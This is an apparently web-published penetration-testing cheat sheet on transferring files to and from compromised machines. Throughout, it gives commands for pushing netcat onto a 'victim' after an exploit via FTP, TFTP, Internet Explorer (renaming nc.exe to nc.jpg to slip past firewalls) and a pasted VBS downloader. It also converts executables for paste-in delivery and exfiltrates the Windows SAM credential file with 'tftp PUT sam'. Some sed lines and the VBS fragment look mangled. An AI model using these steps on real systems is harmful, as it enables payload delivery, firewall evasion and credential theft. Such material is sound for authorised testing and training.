Show Menu

File Transfers Cheat Sheet by



Note: Uploaded file cannot be larger than 64-bytes. UPX can be used to compress files.

locate exe2ba­t.exe
wine exe2ba­t.exe
upx -9 nc.exe (to compress nc.exe)
ls -l nc.exe (should now be smaller)
wine exe2ba­t.exe /root/­nc.exe nc.txt (convert nc.exe to nc.txt)
cat nc.txt | more (should be a hex dump)
Near the end of nc.txt, exe2bat tells the debugger on the windows victim to create an exe

Gain your shell using your usual exploit then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created on the victim machine.


python -m Simple­HTT­PServer

Browse to victim from attacking machine for a directory listing


nc -lvp 12345 | tar -xf - (on receiver)
tar -cf - filena­me.txt | nc -vn 192.16­8.1.14 12345 (on sender)

Note: You will have no indication of file progress. just wait a period of time then CTRL+C


FTP - Windows

Connect to an ftp server on port 80
open x.x.x.x 80

Connect using commands in config.txt
ftp -n -v -s:con­fig.txt
user uid1234 (username)
uid1234 (password)

FTP Upload

Outbound FTP is usually allowed in companies.

pure-pw useradd hacker -u ftpusers -d /ftphome/ (create user hacker)
pure-pw mkdb
cp /pente­st/­win­dow­s/n­c.exe /ftphome
/etc/i­nit.d/­pur­e-ftpd start
ftp (test login)
ls (nc.exe should appear)

Victim (Windows)
After getting a shell:
echo open 192.16­8.34.10 > ftp.txt (commands to be run in the -s step)
echo myftp>> ftp.txt (no space between username and append command)
echo myftp>> ftp.txt
echo bin >> ftp.txt
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt (-s run commands in ftp.txt)


/etc/i­nit.d/­pur­e-ftpd start (start ftp server)
netstat -antp (confirm server on port 21)
/etc/i­nit.d/­pur­e-ftpd stop (stop ftp server)

ls -l /ftphome (home ftp directory created by ftpd)
cp nc.exe /ftphome (copy netcat to ftphome)
ftp (login ftp to server)
ls (netcat should appear)
bin (switch to binary for file transfer)
get nc.exe (confirm file transfer works)
file nc.exe (confirm file properties are intact)

Internet Explorer

Can be good for bypassing Firewalls
mv nc.exe to nc.jpg (exe files will open a dialog, so they need to be converted)
./abil­ity­-linux (gain your remote shell)
cd prog*
cd internet*
start iexplo­re.exe http:/­/19­2.1­68.8.1­73/­nc.jpg` (nc.jpg will be downloaded to temp directory)
Navigate to the temporary internet files on the victim (e.g. c:\doc­uments and settin­gs­\off­sec­\local settin­gs­\tem­porary internet files)
copy nc.jpg c:\
rename nc.jpg nc.exe
nc.exe (nc should be functi­onal)


'Barabas pure vbs downloader - tested on XP sp2
'Microsoft fixed adodbs­tream but guess what :)
'(c)dec 2004
'First argument = complete url to download
'Second Argument = filename you want to save
'thnks to http:/­/ww­w.e­ric­phe­­m/s­cri­pti­ng/­sam­ple­s/B­ina­ryD­own­load/
'v2 - now includes proxy support for the winhttp request stuff

strUrl = WScrip­t.A­rgu­men­ts.I­tem(0)
StrFile = WScrip­t.A­rgu­men­ts.I­tem(1)

'WinHt­tpR­equest proxy settings.

VBS Download (with down.vbs)

cat down.vbs (confirm contents)
sed ’s/^echo /‘ downlo­ad-­vbs­cript (add echo to start of lines)
sed ’s/^echo /‘ downlo­ad-­vbs­cript | sed ’s/S/ >> down.vbs/‘ (add append to end of lines)
sed ’s/^echo /‘ downlo­ad-­vbs­cript | sed ’s/S/ >> down.vbs/‘ | grep -v ‘echo >> down.dbs’ (remove echo on blank lines)
/etc/i­nit.d/­apache2 start
cp nc.exe /var/www/

After getting a shell on your Victim:
Copy and paste the text output of the final sed command above and hit enter to create down.vbs.
cscript down.vbs http:/­/19­2.1­68.8.1­73/­nc.exe nc2.exe (to run down.vbs, which will download nc.exe to nc2.exe)
nc.exe (check if file is functi­onal)

TFTP Server

apt-get install atftpd
atftpd --daemon --port 69 /tmp (start in daemon mode on port 69, home directory /tmp)
atftpd --daemon --port 1234 /tmp (start in daemon mode on port 1234, home directory /tmp)
netstat -anup | grep atftp (should be listening on port 69 udp)
cp /nc.exe /tmp

Downlo­ading in Linux
tftp (connect to server)
get nc.exe
ls -l nc.exe
file nc.exe

Kill Server
ps -ef | grep atftp
kill -9 16084 (first column number)
netstat -anup | grep 69 (confirm server has been killed)


Note: Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transf­erred will usually be read only. Change attrib of file to delete using attrib -r filename.

Download from Attacker
atftpd --daemon --port 69 /tmp
/usr/s­har­e/w­ind­ows­-bi­nar­ies­/nc.exe /tmp
chmod 777 /tmp/n­c.exe

Initiate your remote shell to the Windows PC using your exploit:
./abil­ity­-li­ (ability exploit, served, shell started)
tftp -i 192.16­8.23.10 GET nc.exe (on Windows Victim, IP = Kali)

Upload to Attacker
tftp -i 192.16­8.8.172 PUT sam
sam should now appear in /tmp on the Kali machine

Download in Windows
tftp get­:/­lanscan (get the file lanscan from TFTP server


No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Selenium WebDriver Cheat Sheet Cheat Sheet
          Cypressio Cheat Sheet
          ISTQB Test Automation Engineering Cheat Sheet

          More Cheat Sheets by fred

          Passive Recon Cheat Sheet